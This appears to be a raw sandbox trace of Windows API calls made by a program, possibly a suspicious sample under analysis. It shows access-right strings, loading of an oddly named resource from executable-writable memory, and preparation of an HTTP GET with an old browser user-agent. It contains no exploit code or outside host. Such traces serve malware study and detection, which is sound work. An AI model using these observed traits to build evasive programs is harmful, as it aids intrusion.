[0130.159] SysReAllocStringLen (in: pbstr=0x28fdf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fdf40*="STANDARD_RIGHTS_WRITE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x28fdf30*="STANDARD_RIGHTS_READ 2") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x28fdf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fdf10*="DELETE") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fdf00*="READ_CONTROL") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fdef0*="WRITE_OWNER") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fdee0*="WRITE_DAC") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x28fded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x28fdec0*="DESKTOP_WRITEOBJECTS") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x28fdeb0*="DESKTOP_JOURNALRECORD") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fdea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x28fdea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x28fde90*="DESKTOP_HOOKCONTROL") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x28fde80*="DESKTOP_CREATEWINDOW") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x28fde70*="DESKTOP_CREATEMENU") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x28fde60*="DESKTOP_READOBJECTS") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x28fde50*="DESKTOP_ENUMERATE") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fde30*="STANDARD_RIGHTS_WRITE") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fde20*="STANDARD_RIGHTS_READ") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fde10*="STANDARD_RIGHTS_ALL") returned 1
[0130.160] SysReAllocStringLen (in: pbstr=0x28fde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fde00*="DELETE") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fddf0*="READ_CONTROL") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fdde0*="WRITE_OWNER") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fddd0*="WRITE_DAC") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x28fddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x28fddb0*="WINSTA_READSCREEN") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x28fdda0*="WINSTA_READATTRIBUTES") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x28fdd90*="WINSTA_EXITWINDOWS") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x28fdd80*="WINSTA_ENUMERATE") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x28fdd70*="WINSTA_ENUMDESKTOPS") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x28fdd60*="WINSTA_CREATEDESKTOP") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x28fdd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x28fdd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fdd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fdd20*="STANDARD_RIGHTS_WRITE") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fdd10*="STANDARD_RIGHTS_READ") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x28fdd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fdcf0*="READ_CONTROL") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x28fdce0*="SI_ACCESS_SPECIFIC") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fdcd0*="WRITE_DAC") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x28fdcc0*="FILE_DELETE") returned 1
[0130.161] SysReAllocStringLen (in: pbstr=0x28fdcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x28fdcb0*="FILE_DELETE_CHILD") returned 1
[0130.163] SetClassLongA (hWnd=0x501e0, nIndex=-14, dwNewLong=65575) returned 0x0
[0130.163] GetSystemMenu (hWnd=0x501e0, bRevert=0) returned 0x501b7
[0130.163] DeleteMenu (hMenu=0x501b7, uPosition=0xf030, uFlags=0x0) returned 1
[0130.163] DeleteMenu (hMenu=0x501b7, uPosition=0xf000, uFlags=0x0) returned 1
[0130.164] DeleteMenu (hMenu=0x501b7, uPosition=0xf010, uFlags=0x0) returned 1
[0130.164] GetCurrentThreadId () returned 0x860
[0130.164] ResetEvent (hEvent=0xa0) returned 1
[0130.164] GetCurrentThreadId () returned 0x860
[0130.164] GetCurrentThreadId () returned 0x860
[0130.164] GetCurrentThreadId () returned 0x860
[0130.164] ResetEvent (hEvent=0xa0) returned 1
[0130.164] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f6f4, fWinIni=0x0 | out: pvParam=0x6f6f4) returned 1
[0130.164] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f6f4, fWinIni=0x0 | out: pvParam=0x6f6f4) returned 1
[0130.164] GetSystemMetrics (nIndex=49) returned 16
[0130.164] GetSystemMetrics (nIndex=50) returned 16
[0130.164] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f73c, fWinIni=0x0 | out: pvParam=0x6f73c) returned 1
[0130.164] IsWindowVisible (hWnd=0x501e0) returned 0
[0130.165] GetCurrentThreadId () returned 0x860
[0130.165] VirtualQuery (in: lpAddress=0x28d1668, lpBuffer=0x6f60c, dwLength=0x1c | out: lpBuffer=0x6f60c*(BaseAddress=0x28d1000, AllocationBase=0x2810000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0130.165] FindResourceA (hModule=0x2810000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2918990
[0130.165] FindResourceA (hModule=0x2810000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2918990
[0130.165] LoadResource (hModule=0x2810000, hResInfo=0x2918990) returned 0x291f044
[0130.165] SizeofResource (hModule=0x2810000, hResInfo=0x2918990) returned 0xca5
[0130.165] LockResource (hResData=0x291f044) returned 0x291f044
[0130.165] GetCurrentThreadId () returned 0x860
[0130.165] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f3c0, fWinIni=0x0 | out: pvParam=0x6f3c0) returned 1
[0130.165] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f3c0, fWinIni=0x0 | out: pvParam=0x6f3c0) returned 1
[0130.165] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f3c0, fWinIni=0x0 | out: pvParam=0x6f3c0) returned 1
[0130.165] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x6f3c0, fWinIni=0x0 | out: pvParam=0x6f3c0) returned 1
[0130.166] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.166] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3a4 | out: lptm=0x6f3a4) returned 1
[0130.166] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0130.167] CreateFontIndirectA (lplf=0x6f35c) returned 0x240a083d
[0130.167] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.167] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3dc | out: lptm=0x6f3dc) returned 1
[0130.168] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.168] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.168] GetSystemMetrics (nIndex=6) returned 1
[0130.168] VirtualAlloc (lpAddress=0x2934000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2934000
[0130.168] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.168] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3a4 | out: lptm=0x6f3a4) returned 1
[0130.168] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.168] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3dc | out: lptm=0x6f3dc) returned 1
[0130.168] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.168] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.168] GetSystemMetrics (nIndex=6) returned 1
[0130.169] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.169] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3a4 | out: lptm=0x6f3a4) returned 1
[0130.169] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.169] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3dc | out: lptm=0x6f3dc) returned 1
[0130.169] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.169] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.169] GetSystemMetrics (nIndex=6) returned 1
[0130.169] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.169] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3a4 | out: lptm=0x6f3a4) returned 1
[0130.169] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.169] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3dc | out: lptm=0x6f3dc) returned 1
[0130.169] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.169] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.169] GetSystemMetrics (nIndex=6) returned 1
[0130.170] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.170] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3b8 | out: lptm=0x6f3b8) returned 1
[0130.170] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.170] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3f0 | out: lptm=0x6f3f0) returned 1
[0130.170] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.170] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.170] GetSystemMetrics (nIndex=6) returned 1
[0130.170] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.170] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0bc | out: lptm=0x6f0bc) returned 1
[0130.170] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.170] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0f4 | out: lptm=0x6f0f4) returned 1
[0130.170] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.170] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.170] GetSystemMetrics (nIndex=6) returned 1
[0130.170] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.170] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3b8 | out: lptm=0x6f3b8) returned 1
[0130.170] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.170] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3f0 | out: lptm=0x6f3f0) returned 1
[0130.170] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.170] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.170] GetSystemMetrics (nIndex=6) returned 1
[0130.171] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.171] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0bc | out: lptm=0x6f0bc) returned 1
[0130.171] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.171] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0f4 | out: lptm=0x6f0f4) returned 1
[0130.171] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.171] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.171] GetSystemMetrics (nIndex=6) returned 1
[0130.171] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.171] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3b8 | out: lptm=0x6f3b8) returned 1
[0130.171] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.171] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3f0 | out: lptm=0x6f3f0) returned 1
[0130.171] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.171] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.171] GetSystemMetrics (nIndex=6) returned 1
[0130.171] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.171] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0bc | out: lptm=0x6f0bc) returned 1
[0130.171] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.171] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0f4 | out: lptm=0x6f0f4) returned 1
[0130.171] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.171] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.171] GetSystemMetrics (nIndex=6) returned 1
[0130.172] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.172] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3a4 | out: lptm=0x6f3a4) returned 1
[0130.172] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.172] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3dc | out: lptm=0x6f3dc) returned 1
[0130.172] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.172] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.172] GetSystemMetrics (nIndex=6) returned 1
[0130.172] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.172] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3a4 | out: lptm=0x6f3a4) returned 1
[0130.172] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.172] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3dc | out: lptm=0x6f3dc) returned 1
[0130.172] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.172] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.172] GetSystemMetrics (nIndex=6) returned 1
[0130.173] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.173] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3b8 | out: lptm=0x6f3b8) returned 1
[0130.173] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.173] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3f0 | out: lptm=0x6f3f0) returned 1
[0130.173] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.173] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.173] GetSystemMetrics (nIndex=6) returned 1
[0130.173] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.173] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0bc | out: lptm=0x6f0bc) returned 1
[0130.173] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.173] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0f4 | out: lptm=0x6f0f4) returned 1
[0130.173] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.173] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.173] GetSystemMetrics (nIndex=6) returned 1
[0130.173] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.173] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3b8 | out: lptm=0x6f3b8) returned 1
[0130.173] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.173] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3f0 | out: lptm=0x6f3f0) returned 1
[0130.173] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.173] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.174] GetSystemMetrics (nIndex=6) returned 1
[0130.174] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.174] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0bc | out: lptm=0x6f0bc) returned 1
[0130.174] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.174] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0f4 | out: lptm=0x6f0f4) returned 1
[0130.174] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.174] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.174] GetSystemMetrics (nIndex=6) returned 1
[0130.174] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.174] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3b8 | out: lptm=0x6f3b8) returned 1
[0130.174] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.174] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3f0 | out: lptm=0x6f3f0) returned 1
[0130.174] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.174] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.174] GetSystemMetrics (nIndex=6) returned 1
[0130.174] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.174] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0bc | out: lptm=0x6f0bc) returned 1
[0130.174] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.175] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0f4 | out: lptm=0x6f0f4) returned 1
[0130.175] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.175] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.175] GetSystemMetrics (nIndex=6) returned 1
[0130.175] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.175] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3b8 | out: lptm=0x6f3b8) returned 1
[0130.175] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.175] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3f0 | out: lptm=0x6f3f0) returned 1
[0130.175] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.175] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.175] GetSystemMetrics (nIndex=6) returned 1
[0130.175] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.175] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0bc | out: lptm=0x6f0bc) returned 1
[0130.175] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.175] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f0f4 | out: lptm=0x6f0f4) returned 1
[0130.175] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.175] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.175] GetSystemMetrics (nIndex=6) returned 1
[0130.176] GetDC (hWnd=0x0) returned 0x1a01071a
[0130.176] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3a4 | out: lptm=0x6f3a4) returned 1
[0130.176] SelectObject (hdc=0x1a01071a, h=0x240a083d) returned 0x18a002e
[0130.176] GetTextMetricsA (in: hdc=0x1a01071a, lptm=0x6f3dc | out: lptm=0x6f3dc) returned 1
[0130.176] SelectObject (hdc=0x1a01071a, h=0x18a002e) returned 0x240a083d
[0130.176] ReleaseDC (hWnd=0x0, hDC=0x1a01071a) returned 1
[0130.176] GetSystemMetrics (nIndex=6) returned 1
[0130.178] SysReAllocStringLen (in: pbstr=0x293f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x293f388*="GET") returned 1
[0130.178] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.178] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.178] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.178] SysReAllocStringLen (in: pbstr=0x293f388*="GET", psz="GET", len=0x3 | out: pbstr=0x293f388*="GET") returned 1
[0130.178] SysReAllocStringLen (in: pbstr=0x293f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x293f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0130.178] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x6f440, lpdwBufferLength=0x6f444 | out: lpBuffer=0x6f440, lpdwBufferLength=0x6f444) returned 1
[0130.261] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x6f440, dwBufferLength=0x4) returned 1
[0130.261] VirtualFree (lpAddress=0x2940000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0130.261] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2936490, cbMultiByte=3, lpWideCharStr=0x6e378, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0130.262] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.262] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.262] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.262] SysReAllocStringLen (in: pbstr=0x293f388*="GET", psz="GET", len=0x3 | out: pbstr=0x293f388*="GET") returned 1
[0130.262] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.262] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.262] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.262] SysReAllocStringLen (in: pbstr=0x293f388*="GET", psz="GET", len=0x3 | out: pbstr=0x293f388*="GET") returned 1
[0130.263] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x200, newValue=0x0, param_4=1) returned 0
[0130.263] GetSysColor (nIndex=20) returned 0xffffff
[0130.263] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0130.263] FlatSB_SetScrollInfo (param_1=0xb00ea, code=0, psi=0x6e2ae, fRedraw=1)
[0130.263] CallWindowProcA (lpPrevWndFunc=0x2817038, hWnd=0xb00ea, Msg=0x46, wParam=0x0, lParam=0x6e1ac) returned 0x0
[0130.268] GetTextExtentPoint32A (in: hdc=0x1a01071a, lpString="0", c=1, psizl=0x6f534 | out: psizl=0x6f534) returned 1
[0130.268] IsIconic (hWnd=0xb00ea) returned 0
[0130.268] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f534 | out: lpRect=0x6f534) returned 1
[0130.268] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.268] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.268] IsIconic (hWnd=0xb00ea) returned 0
[0130.268] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f47c | out: lpRect=0x6f47c) returned 1
[0130.268] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.268] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.268] IsIconic (hWnd=0xb00ea) returned 0
[0130.268] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.268] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.268] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.268] IsIconic (hWnd=0xb00ea) returned 0
[0130.268] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.268] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x200, newValue=0x0, param_4=0) returned 0
[0130.268] GetSysColor (nIndex=20) returned 0xffffff
[0130.268] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0130.268] FlatSB_SetScrollInfo (param_1=0xb00ea, code=0, psi=0x6f48a, fRedraw=1) returned 0
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] IsIconic (hWnd=0xb00ea) returned 0
[0130.269] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] IsIconic (hWnd=0xb00ea) returned 0
[0130.269] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] IsIconic (hWnd=0xb00ea) returned 0
[0130.269] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
